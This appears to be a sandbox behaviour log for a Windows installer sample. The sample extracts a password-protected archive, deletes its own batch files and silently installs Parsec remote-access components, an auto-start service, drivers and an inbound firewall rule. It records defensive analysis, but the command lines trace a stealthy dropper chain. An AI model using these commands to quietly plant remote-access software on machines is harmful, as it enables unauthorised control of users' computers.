Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.inf" "9" "464910f03" "0000000000000158" "WinSta0\Default" "0000000000000160" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "201" "ROOT\USB\0000" "C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9\parsecvusba.inf" "oem4.inf:*:*:0.2.8.0:Root\Parsec\VUSBA," "464910f03" "0000000000000158"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.inf" "9" "43799a85b" "0000000000000170" "WinSta0\Default" "0000000000000158" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "43799a85b" "0000000000000158" "WinSta0\Default"
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process created: C:\Windows\System32\runonce.exe "C:\Windows\system32\runonce.exe" -r
Source: C:\Windows\System32\runonce.exe Process created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "4fea13f63" "0000000000000190" "WinSta0\Default"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec\vdd\parsec-vdd.exe "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
Source: C:\Windows\SysWOW64\wevtutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wevtutil.exe Process created: C:\Windows\System32\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe Process created: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp "C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp" /SL5="$1043C,49640288,887296,C:\Users\user\Desktop\uu8v4UUzTU.exe"
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "CMD" /C del "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "CMD" /C del "SoundNight.7z"
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C "C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\PSecWin\7z.exe "C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-remove.vbs"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-remove.vbs"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-add.vbs" "C:\Program Files\Parsec\parsecd.exe"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\System32\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" control Parsec 200
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" stop Parsec
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" delete Parsec
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start Parsec
Source: C:\Program Files\Parsec\pservice.exe Process created: unknown unknown
Source: C:\Program Files\Parsec\pservice.exe Process created: unknown unknown
Source: C:\Program Files\Parsec\pservice.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec\vusb\parsec-vud.exe "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.inf" "9" "464910f03" "0000000000000158" "WinSta0\Default" "0000000000000160" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "201" "ROOT\USB\0000" "C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9\parsecvusba.inf" "oem4.inf:*:*:0.2.8.0:Root\Parsec\VUSBA," "464910f03" "0000000000000158"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.inf" "9" "43799a85b" "0000000000000170" "WinSta0\Default" "0000000000000158" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "43799a85b" "0000000000000158" "WinSta0\Default"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "4fea13f63" "0000000000000190" "WinSta0\Default"
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process created: C:\Windows\System32\runonce.exe "C:\Windows\system32\runonce.exe" -r
Source: C:\Windows\System32\runonce.exe Process created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec\vdd\parsec-vdd.exe "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat""
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\wevtutil.exe Process created: C:\Windows\System32\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\uu8v4UUzTU.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: winhttpcom.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpSection loaded: mlang.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: version.dll
